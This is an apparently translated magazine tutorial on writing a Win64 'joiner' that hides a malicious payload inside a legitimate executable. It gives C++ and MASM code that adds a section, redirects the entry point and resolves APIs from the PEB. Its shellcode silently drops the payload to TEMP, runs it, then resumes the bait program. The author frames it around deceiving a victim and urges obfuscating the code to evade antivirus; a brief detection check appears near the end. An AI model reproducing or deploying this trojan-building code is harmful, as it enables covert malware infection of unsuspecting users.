High-quality gluing. Writing a joiner of executable files for Win64.

Mutt · Jun 7, 2021

Let's imagine that we need to run some malicious code on the victim's machine. We do not have access to this computer, and it seems that the easiest option would be to force the victim to do everything for us. Of course, no one in their right mind will launch questionable software on their device, so the victim needs to be interested - to offer something useful. This is where a joiner comes into play, a tool that will embed our code into the payload and secretly launch it.

WARNING
This article is intended for white-hat hackers, professional penetration testers, and information security executives (CISOs). Neither the author nor the editors are responsible for any possible harm caused by the use of the information in this article.

Are there out-of-the-box solutions for gluing programs to malicious payloads? Of course, but they come with a number of problems. Such tools are detected by antiviruses, cost money, and are often sold as a service, that is, they charge for each individual gluing. Free and easy ways of embedding a payload, such as "put the files in a self-extracting archive", are utterly banal snake oil. A hand-made solution can be improved, corrected when it gets detected, and, of course, will remain free.

A LITTLE THEORY
A joiner can and should glue two executable files together. The first is a visual shell, a pretty picture, a red herring. This is what the user sees on the screen after launching the executable file. The second is the payload, which is launched without the user's explicit consent. By default, the second file is not hidden in any way: if it opens windows or, for example, plays loud music, the user will notice all of it. The payload therefore has to take care of operating covertly by itself. A joiner only glues; it does not mask the malicious application.

Can a joiner glue an executable file to a picture? It can, but it makes no sense. Purely theoretically, if it glued an executable file and a picture together, the output would still be an executable file without a .jpg, .png or similar extension, and image editors and viewers would not be able to open it. Alternatively, we would get a picture, but then we could not run the executable part. There is one more option, in which the application starts and opens a picture through the ShellExecute API. It is an entertaining trick, but nothing more: there is no benefit in it.

HOW OUR VERSION WORKS
Our target will be Windows 10 x64, but once you understand the principle, you can easily rework the toolkit for other versions of the Windows family. The code should work on Windows 7/8 too, but it was not tested there. We will be using a mixture of C++ and assembler.

Work algorithm
The shell is our first exe that will be visible to the client. This is, so to speak, bait. The load is the second exe, which contains malicious content. An additional section is added to the shell, where the shellcode and load are written. Control is immediately transferred to the shellcode, whose task is to extract the load, save it to disk and run it. At the top level, it all comes down to the fact that we get a certain byte array, which must be put in an additional section. Then all that remains is to fix the shell entry point, and that's it - the gluing is complete.

Code:

try {
const auto goodfile = std::wstring(argv[1]);
const auto badfile = std::wstring(argv[2]);
const auto content = CreateData(badfile,goodfile);
AddDataToFile(goodfile, content, L"fixed.exe");
}
catch (const std::exception& error)
{
std::cout << error.what() << std::endl;
}

Adding a section
This is the simplest part of the algorithm, so we'll start with it to warm up. Open the shell file for reading:

Code:

std::ifstream inputFile(inputPe, std::ios::binary);
if (inputFile.fail())
{
const auto message = Utils::WideToString(L"Unable to open " + inputPe);
throw std::logic_error(message);
}

We will need a library for working with PE files. It greatly simplifies adding a section, editing its attributes, fixing the entry point, and so on. I chose the old, time-tested PE Bliss library.

But the library needs to be tweaked a bit if we want to compile the project as C++17. The edits are trivial: the obsolete auto_ptr has to be replaced with unique_ptr. Because of these edits, I would suggest storing the library code directly in your repository rather than using a submodule. The section is added like this:

Code:

auto peImage = pe_bliss::pe_factory::create_pe(inputFile);
pe_bliss::section newSection;
newSection.readable(true).writeable(true).executable(true); // Section gets read + write + execute attributes
newSection.set_name("joiner"); // Section name
newSection.set_raw_data(std::string(data.cbegin(), data.cend())); // Section content
pe_bliss::section& added_section = peImage.add_section(newSection);
const auto alignUp = [](unsigned int value, unsigned int aligned) -> unsigned int
{
const auto num = value / aligned;
return (num * aligned < value) ? (num * aligned + aligned) : (num * aligned);
};
peImage.set_section_virtual_size(added_section,
alignUp (data.size (), peImage.get_section_alignment ())); // The virtual size of the section is aligned larger
peImage.set_ep (added_section.get_virtual_address () + sizeof (HEAD));
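
The rounding done by the alignUp lambda can be checked on its own. The sketch below restates it as a free function; the name AlignUp and the 0x1000 alignment used in the checks are illustrative assumptions (0x1000 is a common section alignment, but the real value comes from the PE header).

```cpp
#include <cstdint>

// Round value up to the nearest multiple of alignment (alignment must be non-zero).
// Same result as the lambda above: exact multiples are returned unchanged.
constexpr std::uint32_t AlignUp(std::uint32_t value, std::uint32_t alignment)
{
    const std::uint32_t remainder = value % alignment;
    return remainder == 0 ? value : value + (alignment - remainder);
}

// Compile-time checks with an assumed alignment of 0x1000.
static_assert(AlignUp(0, 0x1000) == 0, "zero stays zero");
static_assert(AlignUp(1, 0x1000) == 0x1000, "partial page rounds up");
static_assert(AlignUp(0x1000, 0x1000) == 0x1000, "exact multiple is unchanged");
static_assert(AlignUp(0x1001, 0x1000) == 0x2000, "one byte over takes a new page");
```

So a section holding 0x1001 bytes of raw data would get a virtual size of 0x2000 under that assumed alignment.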

The last line deserves separate comments. The entry point changes there, but the new EP (entry point) is set not at the very beginning of the new section, but at the beginning with an offset equal to the size of the HEAD structure. This structure looks like this:

Code:

struct HEAD
{
unsigned long long sizeOfPayload;
unsigned long long OEP;
};

A logical question arises: what are these fields and where do their values come from? The sizeOfPayload field is the size of the load file, and the OEP is the shell entry point before we added the new section and changed the entry point to it. How the structure of the new section will look as a whole is shown in the picture.

The structure of the new section

Assembler and shellcode
The code we add to the shell must meet certain requirements. And in assembly language, it's not just easier to achieve this match - it's the only possible way. Let's figure out why.

When we inject our code into someone else's .exe, we must be prepared for it to run at an arbitrary address with no preparation by the loader. There will be no known addresses of API functions and nobody will fix up relocations, so the code has to be self-contained. Such code is sometimes referred to as shellcode, although it is not shellcode in the sense of exploiting vulnerabilities. Rather, it is code written in shellcode style.

So this code:

must be able to work from any address, no matter at what address it ended up in memory;
must find the addresses of the functions it needs.

Delta offset
If the file was compiled for address X, and started from address Y, then all absolute addresses require correction. The difference between these addresses is called delta offset. Here is the code to calculate such a delta offset:

Code:

call delta
delta:
pop rax
mov rcx, offset delta
sub rax, rcx

A function call with this offset looks like this:

Code:

mov rax, offset GetNtdllByModuleList
add rax, [rsp+100h+var_delta]
call rax

Strings mixed with code
Storing strings, variables (data) and code in separate sections is unacceptable for shellcode. Therefore, code and data are mixed here. There are no problems with local variables on the stack. The following technique is used with strings:

Code:

jmp short begin
getprocaddr:
db 'LdrGetProcedureAddress',0
getdllhandle:
db 'LdrGetDllHandle',0
begin:

That is, strings sit right among the instructions. Strings cannot be executed, of course, so short jumps are used to skip over them.

Finding shellcode boundaries
For this we will use public variables. In the assembly listing, at the very beginning of our shellcode, we'll put a variable. It will serve as a start marker. Likewise, we'll put the variable at the end of the code.

Code:

PUBLIC sizeOfPayload ; Start marker
PUBLIC FinishMarker ; Shellcode completion marker
.CODE
sizeOfPayload QWORD 0 ; Fields of the HEAD structure
OEP QWORD 0
launcher proc ; The beginning of the code itself

MASM, cmake and Visual Studio

We need to make these tools work together. The macro assembler is needed to write the shellcode, because on the x64 architecture you cannot embed assembly code into a C++ program using __asm {}. A separate file with the assembly code is created (the .asm extension is normally used for such files), and the following directives are added to CMakeLists.txt:

Code:

enable_language(ASM_MASM)
set(ASMSRC shellcode.asm)
target_sources(${PROJECT_NAME} PRIVATE ${ASMSRC})
if(CMAKE_CL_64 EQUAL 0)
set_source_files_properties(${ASMSRC} PROPERTIES COMPILE_FLAGS "/safeseh /DSC_WIN32")
else()
set_source_files_properties(${ASMSRC} PROPERTIES COMPILE_FLAGS "/DSC_WIN64")
endif()

Now we will be able to link the two object files, provided that the extern keyword is used on the C++ side. For example:

Code:

extern "C" unsigned long long sizeOfPayload;

Load start algorithm
The shell code works like this:
1. Looks for the path to the TEMP directory.
2. Writes a file with a load there.
3. Runs this file for execution.
4. Transfers control to the original shell entry point.

As a listing, it might look like this:

Code:

void DropToDiskAndExecute(const uint8_t* data, unsigned int sizeData, const API_Adresses* addresses)
{
STARTUPINFOA startup{0};
PROCESS_INFORMATION procInfo{0};
const char surprise[] = "payload.exe";
const auto size = reinterpret_cast<gettemppatha*>(
addresses->GetTempPathA)(0, nullptr);
auto* location = reinterpret_cast<virtualalloc*>(addresses->VirtualAlloc)
(nullptr, size + sizeof(surprise),
MEM_COMMIT, PAGE_READWRITE);
if (!location)
{
return;
}
reinterpret_cast<gettemppatha*>(addresses->GetTempPathA)(size, reinterpret_cast<LPSTR>(location));
reinterpret_cast<winlstrcat*>(addresses->lstrcatA)(reinterpret_cast<LPSTR>(location), surprise);
auto handle = reinterpret_cast<createfilea*>(addresses->CreateFileA)
(reinterpret_cast<LPSTR>(location), GENERIC_WRITE,
FILE_SHARE_READ | FILE_SHARE_WRITE, nullptr,
CREATE_ALWAYS, 0, 0);
reinterpret_cast<writefile*>(addresses->WriteFile)(handle, data,
sizeData, nullptr, nullptr);
reinterpret_cast<closehandle*>(addresses->CloseHandle)(handle);
reinterpret_cast<createprocessa*>(addresses->CreateProcessA)(reinterpret_cast<LPSTR>(location),
nullptr,
nullptr, nullptr, FALSE,
0, nullptr, nullptr, &startup, &procInfo);
reinterpret_cast<closehandle*>(addresses->CloseHandle)(procInfo.hProcess);
reinterpret_cast<closehandle*>(addresses->CloseHandle)(procInfo.hThread);
reinterpret_cast<virtualfree*>(addresses->VirtualFree)(location, 0, MEM_RELEASE);
}

This code deserves a closer look. First, it is written in C++. How can that be? Shouldn't shellcode be in assembly? It is: this C++ function came first, and then I disassembled the compiled result and copied it (with minor edits) into shellcode.asm. Second, it is a pure function in the sense that it uses no global state and everything it needs arrives through its parameters. This matters because the compiler emits such functions almost directly in the shellcode style we need. Third, there is no error handling: if something fails, we should neither handle the error nor reveal our presence in any way. It is also important that all the necessary API functions are passed to us as input:

Code:

struct API_Adresses
{
FARPROC GetTempPathA;
FARPROC VirtualAlloc;
FARPROC lstrcatA;
FARPROC CreateFileA;
FARPROC WriteFile;
FARPROC CloseHandle;
FARPROC CreateProcessA;
FARPROC VirtualFree;
};

For the algorithm to work, we need eight functions. But how do you find their addresses?

Search API in memory
The algorithm is quite simple:

1. Find the base address at which ntdll.dll is loaded.
2. In its export table, find two functions: LdrGetDllHandle and LdrGetProcedureAddress.
3. With their help, find the addresses of the eight functions from the API_Adresses structure.

The base address of ntdll.dll can be found this way because peb_loader_data lies inside the ntdll.dll image:

Code:

GetNtdllByModuleList:
mov rax, gs:[60h]
mov ecx, 5A4Dh
mov rax, [rax+18h]
and rax, 0FFFFFFFFFFFFF000h
try_again:
cmp [rax], cx
jz short finish
sub rax, 1000h
jnz short try_again
finish:
ret

The code for parsing the export table was honestly borrowed from the Internet (although the original version contains a bug that has been fixed in my code):

Code:

;http://mcdermottcybersecurity.com/articles/windows-x64-shellcode
;look up address of function from DLL export table
;rcx=DLL imagebase, rdx=function name string
;DLL name must be in uppercase
;r15=address of LoadLibraryA (optional, needed if export is forwarded)
;returns address in rax
;returns 0 if DLL not loaded or exported function not found in DLL
;NtGetProcAddressAsm proc
NtGetProcAddressAsm:
push rcx
push rdx
push rbx
push rbp
push rsi
push rdi
start:
found_dll:
mov rbx, rcx ;get dll base addr — points to DOS "MZ" header
mov r9d, [rbx+3ch] ;get DOS header e_lfanew field for offset to "PE" header
add r9, rbx ;add to base — now r9 points to _image_nt_headers64
add r9, 88h ;18h to optional header + 70h to data directories
;r9 now points to _image_data_directory[0] array entry
;which is the export directory
mov r13d, [r9] ;get virtual address of export directory
test r13, r13 ;if zero, module does not have export table
jnz has_exports
xor rax, rax ;no exports — function will not be found in dll
jmp done
has_exports:
lea r8, [rbx+r13] ;add dll base to get actual memory address
;r8 points to _image_export_directory structure (see winnt.h)
mov r14d, [r9+4] ;get size of export directory
add r14, r13 ;add base rva of export directory
;r13 and r14 now contain range of export directory
;will be used later to check if export is forwarded
mov ecx, [r8+18h] ;NumberOfNames
mov r10d, [r8+20h] ;AddressOfNames (array of RVAs)
add r10, rbx ;add dll base
dec ecx ;point to last element in array (searching backwards)
for_each_func:
lea r9, [r10 + 4*rcx] ;get current index in names array
mov edi, [r9] ;get RVA of name
add rdi, rbx ;add base
mov rsi, rdx ;pointer to function we're looking for
compare_func:
cmpsb
jne wrong_func ;function name doesn't match
mov al, [rsi] ;current character of our function
test al, al ;check for null terminator
jz bug_fix ;bugfix here - double check of zero byte
;if at the end of our string and all matched so far, found it
jmp compare_func ;continue string comparison
wrong_func:
loop for_each_func ;try next function in array
xor rax, rax ;function not found in export table
jmp done
bug_fix:
mov al, [rdi]
test al, al
jz short found_func
jmp short compare_func
found_func: ;ecx is array index where function name found
;r8 points to _image_export_directory structure
mov r9d, [r8+24h] ;AddressOfNameOrdinals (rva)
add r9, rbx ;add dll base address
mov cx, [r9+2*rcx] ;get ordinal value from array of words
mov r9d, [r8+1ch] ;AddressOfFunctions (rva)
add r9, rbx ;add dll base address
mov eax, [r9+rcx*4] ;Get RVA of function using index
cmp rax, r13 ;see if func rva falls within range of export dir
jl not_forwarded
cmp rax, r14 ;if r13 <= func < r14 then forwarded
jae not_forwarded
;forwarded function address points to a string of the form <DLL name>.<function>
;note: dll name will be in uppercase
;extract the DLL name and add ".DLL"
lea rsi, [rax+rbx] ;add base address to rva to get forwarded function name
lea rdi, [rsp+30h] ;using register storage space on stack as a work area
mov r12, rdi ;save pointer to beginning of string
copy_dll_name:
movsb
cmp byte ptr [rsi], 2eh ;check for '.' (period) character
jne copy_dll_name
movsb ;also copy period
mov dword ptr [rdi], 004c4c44h ;add "DLL" extension and null terminator
mov rcx, r12 ;r12 points to "<DLL name>.DLL" string on stack
call r15 ;call LoadLibraryA with target dll
mov rcx, r12 ;target dll name
mov rdx, rsi ;target function name
jmp start ;start over with new parameters
not_forwarded:
add rax, rbx ;add base addr to rva to get function address
done:
pop rdi
pop rsi
pop rbp
pop rbx
pop rdx
pop rcx
ret

Once we have the addresses of the two cornerstone functions, LdrGetDllHandle and LdrGetProcedureAddress, we can find the address of any function in any already loaded library. The kernel32.dll library is also loaded by the loader right away, so we can easily find all the addresses we are interested in:

Code:

GetProcedureAddressAsm:
var_28= word ptr -28h
var_26= word ptr -26h
var_20= qword ptr -20h
var_18= word ptr -18h
var_16= word ptr -16h
var_10= qword ptr -10h
arg_0= qword ptr 8
arg_8= qword ptr 10h
arg_10= qword ptr 18h
arg_18= qword ptr 20h
mov [rsp+arg_10], rbx
mov [rsp+arg_18], rsi
push rdi
sub rsp, 40h
xor ebx, ebx
mov rdi, rdx
test rcx, rcx
mov rdx, rcx
mov ecx, ebx
mov rsi, r9
mov r10, r8
jz short loc_14000689A
cmp [rdx], cx
jz short loc_140006898
nop dword ptr [rax+00000000h]
loc_140006890:
inc ecx
cmp [rdx+rcx*2], bx
jnz short loc_140006890
loc_140006898:
add ecx, ecx
loc_14000689A:
mov [rsp+48h+var_28], cx
lea r9, [rsp+48h+arg_0]
add cx, 2
mov [rsp+48h+var_20], rdx
mov [rsp+48h+var_26], cx
lea r8, [rsp+48h+var_28]
xor ecx, ecx
xor edx, edx
call r10
test rdi, rdi
jz short loc_1400068D0
cmp byte ptr [rdi], 0
jz short loc_1400068D0
loc_1400068C8:
inc ebx
cmp byte ptr [rbx+rdi], 0
jnz short loc_1400068C8
loc_1400068D0:
mov rcx, [rsp+48h+arg_0]
lea r9, [rsp+48h+arg_8]
mov [rsp+48h+var_18], bx
lea rdx, [rsp+48h+var_18]
inc bx
mov [rsp+48h+var_10], rdi
xor r8d, r8d
mov [rsp+48h+var_16], bx
call rsi
mov rax, [rsp+48h+arg_8]
mov rbx, [rsp+48h+arg_10]
mov rsi, [rsp+48h+arg_18]
add rsp, 40h
pop rdi
ret

Don't understand the assembly code? Initially, this code was also written in C++:

Code:

FARPROC GetProcedureAddress(wchar_t* library, char* function,
LdrGetDllHandlePointer* LdrGetDllHandle,
LdrGetProcedureAddressPointer* LdrGetProcedureAddress)
{
const auto libNameLen = static_cast<USHORT>(GetWcharLen(library));
UNICODE_STRING libraryName{ libNameLen,
libNameLen + sizeof(wchar_t),
library };
HMODULE hModule;
LdrGetDllHandle(nullptr, nullptr, &libraryName, &hModule);
const auto functionNameLen = static_cast<USHORT>(GetCharLen(function));
ANSI_STRING functionName{ functionNameLen,
functionNameLen + sizeof(char),
function };
FARPROC result;
LdrGetProcedureAddress(hModule, &functionName, 0, &result);
return result;
}

To fill the structure with addresses, the following method is used (below is its pseudocode):

Code:

API_Adresses CreateAddressStruct(LdrGetDllHandlePointer* LdrGetDllHandle,
LdrGetProcedureAddressPointer* LdrGetProcedureAddress, GetProcedureAddressPointer* getter)
{
API_Adresses result{};
wchar_t* libname = L"kernel32.dll";
result.CloseHandle = getter(libname, "CloseHandle", LdrGetDllHandle,
LdrGetProcedureAddress);
result.CreateFileA = getter(libname, "CreateFileA", LdrGetDllHandle,
LdrGetProcedureAddress);
result.CreateProcessA = getter(libname, "CreateProcessA", LdrGetDllHandle,
LdrGetProcedureAddress);
result.GetTempPathA = getter(libname, "GetTempPathA", LdrGetDllHandle,
LdrGetProcedureAddress);
result.lstrcatA = getter(libname, "lstrcatA", LdrGetDllHandle,
LdrGetProcedureAddress);
result.VirtualAlloc = getter(libname, "VirtualAlloc", LdrGetDllHandle,
LdrGetProcedureAddress);
result.VirtualFree = getter(libname, "VirtualFree", LdrGetDllHandle,
LdrGetProcedureAddress);
result.WriteFile = getter(libname, "WriteFile", LdrGetDllHandle,
LdrGetProcedureAddress);
return result;
}

All high-level logic looks like this:

Code:

sizeOfPayload QWORD 0
OEP QWORD 0
launcher proc
var_ntdllBase = qword ptr -10h
var_ldrProcedureAddr = qword ptr -20h
var_ldrLoadDll = qword ptr -30h
var_delta = qword ptr -40h
var_apis = qword ptr -90h
call delta
delta:
pop rax
mov rcx, offset delta
sub rax, rcx
sub rsp, 100h
mov [rsp+100h+var_delta], rax
jmp short begin
getprocaddr:
db 'LdrGetProcedureAddress',0
getdllhandle:
db 'LdrGetDllHandle',0
begin:
mov rax, offset GetNtdllByModuleList
add rax, [rsp+100h+var_delta]
call rax
mov [rsp+100h+var_ntdllBase], rax
mov rcx, rax
lea rdx, getprocaddr
mov rax, offset NtGetProcAddressAsm
add rax, [rsp+100h+var_delta]
call rax
mov [rsp+100h+var_ldrProcedureAddr], rax
mov rcx, [rsp+100h+var_ntdllBase]
lea rdx, getdllhandle
mov rax, offset NtGetProcAddressAsm
add rax, [rsp+100h+var_delta]
call rax
mov [rsp+100h+var_ldrLoadDll], rax
mov rdx, rax
mov r8, [rsp+100h+var_ldrProcedureAddr]
mov r9, offset GetProcedureAddressAsm
add r9, [rsp+100h+var_delta]
lea rcx, [rsp+100h+var_apis]
mov rax, offset CreateAddressStructAsm
add rax, [rsp+100h+var_delta]
call rax
mov r8, rax
lea rdx, sizeOfPayload
mov rdx, qword ptr [rdx]
lea rcx, FinishMarker
mov rax, offset DropToDiskAndExecuteAsm
add rax, [rsp+100h+var_delta]
call rax
lea rax, OEP
mov rax, qword ptr [rax]
mov rcx, gs:[60h] ; GetModuleHandleW(nullptr)
mov rcx, [rcx+10h]
add rax, rcx
add rsp, 100h
jmp rax

The code works because the size of the load is located in the sizeOfPayload variable, and the content of the second executable file itself is located right after the shellcode. The entire project code is available at the link: https://bitbucket.org/KulykIevgen/joiner/src/master/.

CONCLUSIONS
Of course, after some time, any anti-virus software will learn to detect this code, but since it is available in source form, it can be modified, obfuscated, mutated, getting clean files every time. And improvements will undoubtedly be needed.

Here you will need support for both the good old architecture x86, and the entire line of Windows, and it will not be out of place to work on stealth. Now the analyst can see something suspicious just by looking at which section the entry point belongs to, since if it is located in the last section, then the file has undergone modifications.
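
From the analyst's side, the entry point check mentioned above can be sketched as follows. This is a minimal illustration, not a complete PE parser: the names ReadAt and EntryPointInLastSection are hypothetical, the code assumes a little-endian host and a raw file image already read into memory, and it treats the final entry of the section table as the "last section". A positive result is only a hint, since legitimate packed executables may trigger it too.

```cpp
#include <cstddef>
#include <cstdint>
#include <cstring>
#include <optional>
#include <vector>

// Read a value of type T at the given offset; nullopt if it would run past
// the end of the buffer. Assumes a little-endian host, like the PE format.
template <typename T>
std::optional<T> ReadAt(const std::vector<std::uint8_t>& buf, std::size_t offset)
{
    if (offset > buf.size() || buf.size() - offset < sizeof(T)) return std::nullopt;
    T value{};
    std::memcpy(&value, buf.data() + offset, sizeof(T));
    return value;
}

// true  - AddressOfEntryPoint lies inside the last section-table entry
// false - it lies elsewhere
// nullopt - the buffer could not be parsed as a PE file
std::optional<bool> EntryPointInLastSection(const std::vector<std::uint8_t>& file)
{
    const auto mz = ReadAt<std::uint16_t>(file, 0);
    const auto lfanew = ReadAt<std::uint32_t>(file, 0x3C);        // e_lfanew
    if (!mz || *mz != 0x5A4D || !lfanew) return std::nullopt;     // "MZ"

    const std::size_t nt = *lfanew;
    const auto signature = ReadAt<std::uint32_t>(file, nt);
    if (!signature || *signature != 0x00004550) return std::nullopt;  // "PE\0\0"

    // The file header starts at nt + 4, the optional header at nt + 24.
    const auto sectionCount = ReadAt<std::uint16_t>(file, nt + 4 + 2);
    const auto optHeaderSize = ReadAt<std::uint16_t>(file, nt + 4 + 16);
    const auto entryPoint = ReadAt<std::uint32_t>(file, nt + 24 + 16);
    if (!sectionCount || *sectionCount == 0 || !optHeaderSize || !entryPoint)
        return std::nullopt;

    // Each section header is 40 bytes: VirtualSize at +8, VirtualAddress at +12.
    const std::size_t last = nt + 24 + *optHeaderSize + 40u * (*sectionCount - 1u);
    const auto virtualSize = ReadAt<std::uint32_t>(file, last + 8);
    const auto virtualAddress = ReadAt<std::uint32_t>(file, last + 12);
    if (!virtualSize || !virtualAddress) return std::nullopt;

    return *entryPoint >= *virtualAddress &&
           *entryPoint - *virtualAddress < *virtualSize;
}
```

A scanner could call EntryPointInLastSection on every executable it inspects and flag files that return true for closer manual review.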

One can often see complaints on the Internet, for example, against distributors of “pills for greed” (crackers and keygens), for the fact that there are many Trojans in such software. But now you know how these Trojans get there.
